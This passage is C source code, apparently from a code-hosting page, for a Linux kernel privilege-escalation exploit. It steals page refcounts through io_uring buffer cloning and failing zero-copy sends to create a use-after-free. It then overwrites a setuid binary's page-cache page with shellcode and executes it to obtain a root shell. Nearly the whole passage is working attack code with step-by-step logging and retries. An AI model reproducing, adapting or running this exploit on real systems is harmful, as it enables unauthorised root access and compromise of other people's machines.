" off = " ANSI_YELLOW "0x%llx\n" ANSI_RESET
|
||||||
|
" user_data = " ANSI_WHITE "0x%llx\n" ANSI_RESET,
|
||||||
|
idx, file_fd,
|
||||||
|
(unsigned long long)sqe->addr,
|
||||||
|
sqe->len, sqe->len,
|
||||||
|
(unsigned)sqe->buf_index,
|
||||||
|
(unsigned long long)sqe->off,
|
||||||
|
(unsigned long long)sqe->user_data);
|
||||||
|
|
||||||
|
r->sq_array[idx] = idx;
|
||||||
|
__atomic_store_n(r->sq_tail, tail + 1, __ATOMIC_RELEASE);
|
||||||
|
|
||||||
|
int ret = syscall(__NR_io_uring_enter, r->fd, 1, 1,
|
||||||
|
IORING_ENTER_GETEVENTS, NULL, (size_t)0);
|
||||||
|
if (ret < 0) {
|
||||||
|
perror("io_uring_enter");
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
static int uring_wait_cqe(struct uring *r, int32_t *res_out) {
|
||||||
|
uint32_t head = *r->cq_head;
|
||||||
|
uint32_t tail;
|
||||||
|
|
||||||
|
for (int i = 0; i < 1000; i++) {
|
||||||
|
tail = __atomic_load_n(r->cq_tail, __ATOMIC_ACQUIRE);
|
||||||
|
if (head != tail) break;
|
||||||
|
usleep(1000);
|
||||||
|
}
|
||||||
|
tail = __atomic_load_n(r->cq_tail, __ATOMIC_ACQUIRE);
|
||||||
|
if (head == tail) {
|
||||||
|
ERR("CQ timeout — no completion");
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
|
||||||
|
uint32_t idx = head & *r->cq_mask;
|
||||||
|
struct io_uring_cqe *cqe = &r->cqes[idx];
|
||||||
|
if (res_out) *res_out = cqe->res;
|
||||||
|
__atomic_store_n(r->cq_head, head + 1, __ATOMIC_RELEASE);
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
static void uring_destroy(struct uring *r) {
|
||||||
|
if (r->sq_ring != MAP_FAILED) munmap(r->sq_ring, r->sq_ring_sz);
|
||||||
|
if (r->cq_ring != MAP_FAILED) munmap(r->cq_ring, r->cq_ring_sz);
|
||||||
|
if (r->sqes != MAP_FAILED) munmap(r->sqes, r->sqes_sz);
|
||||||
|
if (r->fd >= 0) close(r->fd);
|
||||||
|
r->fd = -1;
|
||||||
|
}
|
||||||
|
|
||||||
|
static int create_payload_file(void) {
|
||||||
|
char path[] = "/tmp/.payload_XXXXXX";
|
||||||
|
int fd = mkstemp(path);
|
||||||
|
if (fd < 0) { perror("mkstemp"); return -1; }
|
||||||
|
unlink(path);
|
||||||
|
|
||||||
|
uint8_t page[PAGE_SIZE];
|
||||||
|
memset(page, 0, sizeof(page));
|
||||||
|
memcpy(page, SHELL_ELF, sizeof(SHELL_ELF));
|
||||||
|
|
||||||
|
if (write(fd, page, PAGE_SIZE) != PAGE_SIZE) {
|
||||||
|
perror("write payload");
|
||||||
|
close(fd);
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
return fd;
|
||||||
|
}
|
||||||
|
|
||||||
|
static int evict_page_cache(const char *path) {
|
||||||
|
int fd = open(path, O_RDONLY);
|
||||||
|
if (fd < 0) { perror("open for fadvise"); return -1; }
|
||||||
|
if (posix_fadvise(fd, 0, PAGE_SIZE, POSIX_FADV_DONTNEED) < 0) {
|
||||||
|
perror("fadvise");
|
||||||
|
close(fd);
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
close(fd);
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
static int attempt_exploit(const char *target, pid_t *daemon_out) {
|
||||||
|
LOG("=== starting exploit attempt ===");
|
||||||
|
|
||||||
|
/* 1. mmap anon page + PROT_NONE guard */
|
||||||
|
void *buf = mmap(NULL, 2 * PAGE_SIZE, PROT_READ | PROT_WRITE,
|
||||||
|
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
|
||||||
|
if (buf == MAP_FAILED) { perror("mmap buf"); return -1; }
|
||||||
|
|
||||||
|
/* touch the page to ensure it's faulted in */
|
||||||
|
memset(buf, 'A', PAGE_SIZE);
|
||||||
|
|
||||||
|
/* set second page as PROT_NONE guard */
|
||||||
|
if (mprotect((char *)buf + PAGE_SIZE, PAGE_SIZE, PROT_NONE) < 0) {
|
||||||
|
perror("mprotect guard");
|
||||||
|
munmap(buf, 2 * PAGE_SIZE);
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
OK("mapped buf=%p, guard at %p", buf, (char *)buf + PAGE_SIZE);
|
||||||
|
fprintf(stderr,
|
||||||
|
ANSI_WHITE " ┌─ page @ " ANSI_YELLOW "%p" ANSI_WHITE
|
||||||
|
" refcount:" ANSI_GREEN " 1" ANSI_WHITE " (PTE only)" ANSI_RESET "\n\n", buf);
|
||||||
|
|
||||||
|
/* 2. io_uring setup + register buffer (pins page, refcount += 1024) */
|
||||||
|
struct uring ring;
|
||||||
|
memset(&ring, 0, sizeof(ring));
|
||||||
|
ring.fd = -1;
|
||||||
|
ring.sq_ring = MAP_FAILED;
|
||||||
|
ring.cq_ring = MAP_FAILED;
|
||||||
|
ring.sqes = MAP_FAILED;
|
||||||
|
|
||||||
|
if (uring_setup(&ring, 4) < 0) {
|
||||||
|
munmap(buf, 2 * PAGE_SIZE);
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
if (uring_register_buffers(&ring, buf, PAGE_SIZE) < 0) {
|
||||||
|
uring_destroy(&ring);
|
||||||
|
munmap(buf, 2 * PAGE_SIZE);
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
OK("io_uring buffer registered (refcount now ~1025)");
|
||||||
|
draw_page_chain(
|
||||||
|
ANSI_GREEN, "REGISTERED (+1024)",
|
||||||
|
ANSI_WHITE, "──────────▶",
|
||||||
|
ANSI_GREEN, "anon page", "refcnt:1025 FOLL_PIN");
|
||||||
|
|
||||||
|
/* 2b. Clone buffers to ring2 + spawn daemon to hold imu ref */
|
||||||
|
struct uring ring2;
|
||||||
|
memset(&ring2, 0, sizeof(ring2));
|
||||||
|
ring2.fd = -1;
|
||||||
|
ring2.sq_ring = MAP_FAILED;
|
||||||
|
ring2.cq_ring = MAP_FAILED;
|
||||||
|
ring2.sqes = MAP_FAILED;
|
||||||
|
if (uring_setup(&ring2, 1) < 0) {
|
||||||
|
uring_destroy(&ring);
|
||||||
|
munmap(buf, 2 * PAGE_SIZE);
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
if (uring_clone_buffers(&ring2, &ring) < 0) {
|
||||||
|
uring_destroy(&ring2);
|
||||||
|
uring_destroy(&ring);
|
||||||
|
munmap(buf, 2 * PAGE_SIZE);
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
OK("cloned buffers to ring2 (imu->refs now 2)");
|
||||||
|
fprintf(stderr,
|
||||||
|
ANSI_WHITE " ├─ IORING_REGISTER_CLONE_BUFFERS → imu->refs:" ANSI_GREEN " 2\n"
|
||||||
|
" └─ ring2 fd will block io_buffer_unmap from calling unpin_user_folio" ANSI_RESET "\n\n");
|
||||||
|
pid_t daemon = spawn_ring_holder(ring2.fd);
|
||||||
|
if (daemon < 0) {
|
||||||
|
uring_destroy(&ring2);
|
||||||
|
uring_destroy(&ring);
|
||||||
|
munmap(buf, 2 * PAGE_SIZE);
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
/* parent closes ring2 — daemon holds the only ref to ring2 */
|
||||||
|
uring_destroy(&ring2);
|
||||||
|
OK("daemon pid=%d holds ring2 (prevents unpin on ring1 cleanup)", daemon);
|
||||||
|
*daemon_out = daemon;
|
||||||
|
|
||||||
|
/* 3. steal 1024 refs via failing zcopy sends */
|
||||||
|
LOG("stealing %d refcounts...", GUP_PIN_COUNTING_BIAS);
|
||||||
|
int stolen = 0;
|
||||||
|
for (int i = 0; i < GUP_PIN_COUNTING_BIAS; i++) {
|
||||||
|
int port = PORT_BASE + i * 2;
|
||||||
|
int ret = steal_one_ref(buf, port);
|
||||||
|
if (ret < 0) {
|
||||||
|
/* port in use or RDS unavailable, skip */
|
||||||
|
continue;
|
||||||
|
}
|
||||||
|
stolen++;
|
||||||
|
if (stolen % 256 == 0)
|
||||||
|
LOG(" stolen %d/%d refs", stolen, GUP_PIN_COUNTING_BIAS);
|
||||||
|
}
|
||||||
|
OK("stole %d refcounts (refcount now ~1)", stolen);
|
||||||
|
draw_page_chain(
|
||||||
|
ANSI_YELLOW, "refs stolen (1024)",
|
||||||
|
ANSI_YELLOW, "──────────▶",
|
||||||
|
ANSI_YELLOW, "anon page", "refcnt:~1 pin gone");
|
||||||
|
|
||||||
|
if (stolen < GUP_PIN_COUNTING_BIAS) {
|
||||||
|
ERR("only stole %d/%d refs — may not be enough",
|
||||||
|
stolen, GUP_PIN_COUNTING_BIAS);
|
||||||
|
if (stolen < GUP_PIN_COUNTING_BIAS - 10) {
|
||||||
|
ERR("too few stolen refs, aborting");
|
||||||
|
uring_destroy(&ring);
|
||||||
|
munmap(buf, 2 * PAGE_SIZE);
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/* 4. evict suid binary from page cache BEFORE freeing our page */
|
||||||
|
LOG("evicting %s page 0 from page cache...", target);
|
||||||
|
if (evict_page_cache(target) < 0) {
|
||||||
|
ERR("failed to evict page cache");
|
||||||
|
uring_destroy(&ring);
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
OK("page cache evicted");
|
||||||
|
|
||||||
|
|
||||||
|
/* 6. drain PCP: allocate many pages to push stale entries out */
|
||||||
|
LOG("draining PCP...");
|
||||||
|
void *drain_pages[256];
|
||||||
|
for (int i = 0; i < 256; i++) {
|
||||||
|
drain_pages[i] = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE,
|
||||||
|
MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* 7. munmap first page → refcount 1→0 → freed to TOP of PCP (LIFO) */
|
||||||
|
LOG("unmapping buf to trigger free (refcount 1 -> 0)...");
|
||||||
|
if (munmap(buf, PAGE_SIZE) < 0) {
|
||||||
|
perror("munmap buf");
|
||||||
|
uring_destroy(&ring);
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
OK("page freed to top of PCP — io_uring retains dangling struct page*");
|
||||||
|
draw_page_chain(
|
||||||
|
ANSI_RED, "DANGLING! (bvec)",
|
||||||
|
ANSI_RED, "─X────────▶",
|
||||||
|
ANSI_RED, "FREED (PCP top)", "refcnt:0 PTE gone");
|
||||||
|
|
||||||
|
/* 8. IMMEDIATELY read suid binary → page cache alloc grabs from PCP top */
|
||||||
|
LOG("reading %s to reclaim freed page into page cache...", target);
|
||||||
|
int tfd = open(target, O_RDONLY);
|
||||||
|
if (tfd < 0) { perror("open target"); uring_destroy(&ring); return -1; }
|
||||||
|
/* no fadvise — let the kernel do default readahead */
|
||||||
|
uint8_t verify_buf[PAGE_SIZE];
|
||||||
|
if (pread(tfd, verify_buf, PAGE_SIZE, 0) < 0) {
|
||||||
|
perror("pread target"); close(tfd); uring_destroy(&ring); return -1;
|
||||||
|
}
|
||||||
|
close(tfd);
|
||||||
|
OK("page cache populated");
|
||||||
|
{
|
||||||
|
char pcache_label[24];
|
||||||
|
const char *bn = strrchr(target, '/');
|
||||||
|
snprintf(pcache_label, sizeof(pcache_label), "%.18s pg0", bn ? bn + 1 : target);
|
||||||
|
draw_page_chain(
|
||||||
|
ANSI_RED, "DANGLING! (bvec)",
|
||||||
|
ANSI_RED, "──────────▶",
|
||||||
|
ANSI_YELLOW, "page cache (live!)", pcache_label);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* snapshot legitimate page content before we overwrite it */
|
||||||
|
uint8_t before_buf[64] = {0};
|
||||||
|
{
|
||||||
|
int snap = open(target, O_RDONLY);
|
||||||
|
if (snap >= 0) {
|
||||||
|
pread(snap, before_buf, sizeof(before_buf), 0);
|
||||||
|
close(snap);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
hexdump("page cache page 0 BEFORE overwrite (legitimate ELF)", before_buf, sizeof(before_buf));
|
||||||
|
|
||||||
|
/* clean up drain pages AFTER page cache allocation */
|
||||||
|
for (int i = 0; i < 256; i++)
|
||||||
|
if (drain_pages[i] != MAP_FAILED) munmap(drain_pages[i], PAGE_SIZE);
|
||||||
|
|
||||||
|
/* create payload file AFTER page cache allocation */
|
||||||
|
int payload_fd = create_payload_file();
|
||||||
|
if (payload_fd < 0) {
|
||||||
|
uring_destroy(&ring);
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* 9. READ_FIXED: DMA writes payload into page cache via dangling page */
|
||||||
|
LOG("submitting IORING_OP_READ_FIXED to overwrite page cache...");
|
||||||
|
if (uring_submit_read_fixed(&ring, payload_fd, buf, PAGE_SIZE) < 0) {
|
||||||
|
close(payload_fd);
|
||||||
|
uring_destroy(&ring);
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
|
||||||
|
int32_t cqe_res;
|
||||||
|
if (uring_wait_cqe(&ring, &cqe_res) < 0) {
|
||||||
|
close(payload_fd);
|
||||||
|
uring_destroy(&ring);
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
close(payload_fd);
|
||||||
|
|
||||||
|
if (cqe_res < 0) {
|
||||||
|
ERR("READ_FIXED CQE error: %d (%s)", cqe_res, strerror(-cqe_res));
|
||||||
|
uring_destroy(&ring);
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
OK("READ_FIXED completed: %d bytes written via DMA", cqe_res);
|
||||||
|
draw_page_chain(
|
||||||
|
ANSI_RED, "UAF WRITE (bvec)",
|
||||||
|
ANSI_RED, "══DMA═════▶",
|
||||||
|
ANSI_RED, "PAGE CACHE PWNED", "our shellcode \\o/");
|
||||||
|
|
||||||
|
/* 9. verify overwrite */
|
||||||
|
LOG("verifying page cache overwrite...");
|
||||||
|
tfd = open(target, O_RDONLY);
|
||||||
|
if (tfd < 0) {
|
||||||
|
perror("open target for verify");
|
||||||
|
uring_destroy(&ring);
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
uint8_t check[sizeof(SHELL_ELF)];
|
||||||
|
if (pread(tfd, check, sizeof(check), 0) != sizeof(check)) {
|
||||||
|
perror("pread verify");
|
||||||
|
close(tfd);
|
||||||
|
uring_destroy(&ring);
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
close(tfd);
|
||||||
|
|
||||||
|
hexdump("page cache page 0 AFTER overwrite (our shellcode)", check, sizeof(SHELL_ELF));
|
||||||
|
if (memcmp(check, SHELL_ELF, sizeof(SHELL_ELF)) != 0) {
|
||||||
|
int first_diff = -1;
|
||||||
|
for (int i = 0; i < (int)sizeof(SHELL_ELF); i++) {
|
||||||
|
if (check[i] != SHELL_ELF[i]) { first_diff = i; break; }
|
||||||
|
}
|
||||||
|
ERR("verification FAILED \u2014 first mismatch at byte %d", first_diff);
|
||||||
|
if (first_diff >= 0) {
|
||||||
|
ERR(" expected[%d]: %02x got[%d]: %02x",
|
||||||
|
first_diff, SHELL_ELF[first_diff], first_diff, check[first_diff]);
|
||||||
|
ERR(" page cache page 0 was NOT overwritten \u2014 io_uring wrote to wrong page");
|
||||||
|
}
|
||||||
|
uring_destroy(&ring);
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
OK("verification PASSED — page cache overwritten with SHELL_ELF");
|
||||||
|
|
||||||
|
/* With clone fix, uring_destroy is safe — imu->refs > 1 skips unpin */
|
||||||
|
uring_destroy(&ring);
|
||||||
|
|
||||||
|
/* 10. exec suid binary → root shell */
|
||||||
|
OK("executing %s (now contains setuid(0) + execve /bin/sh)...", target);
|
||||||
|
fprintf(stderr, "\n");
|
||||||
|
fprintf(stderr,
|
||||||
|
ANSI_YELLOW ANSI_BOLD
|
||||||
|
"=== RESTORE: sudo cp /tmp/.backup_%s_%d %s && sudo chmod u+s %s ==="
|
||||||
|
ANSI_RESET "\n",
|
||||||
|
strrchr(target, '/') + 1, getpid(), target, target);
|
||||||
|
fflush(stderr);
|
||||||
|
|
||||||
|
/* close all fds > 2 EXCEPT ring fd doesn't matter, execl replaces us */
|
||||||
|
for (int fd = 3; fd < 1024; fd++) close(fd);
|
||||||
|
|
||||||
|
execl(target, target, (char *)NULL);
|
||||||
|
perror("execl");
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
|
||||||
|
int main(void) {
|
||||||
|
pin_cpu(0);
|
||||||
|
LOG("pinned to CPU 0");
|
||||||
|
|
||||||
|
const char *target = find_suid_target();
|
||||||
|
if (!target) {
|
||||||
|
ERR("no suid binary found");
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (backup_target(target) < 0) {
|
||||||
|
ERR("backup failed, aborting for safety");
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
pid_t daemons[MAX_RETRIES];
|
||||||
|
int ndaemons = 0;
|
||||||
|
|
||||||
|
for (int attempt = 0; attempt < MAX_RETRIES; attempt++) {
|
||||||
|
LOG("attempt %d/%d", attempt + 1, MAX_RETRIES);
|
||||||
|
pid_t daemon = 0;
|
||||||
|
int ret = attempt_exploit(target, &daemon);
|
||||||
|
if (daemon > 0)
|
||||||
|
daemons[ndaemons++] = daemon;
|
||||||
|
if (ret == 0)
|
||||||
|
return 0; /* attempt_exploit exec'd */
|
||||||
|
ERR("attempt %d failed, retrying...", attempt + 1);
|
||||||
|
sleep(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* all attempts failed; kill accumulated daemons */
|
||||||
|
for (int i = 0; i < ndaemons; i++) {
|
||||||
|
kill(daemons[i], SIGKILL);
|
||||||
|
waitpid(daemons[i], NULL, 0);
|
||||||
|
}
|
||||||
|
ERR("all %d attempts failed", MAX_RETRIES);
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
Loading…
Add table
Add a link
Reference in a new issue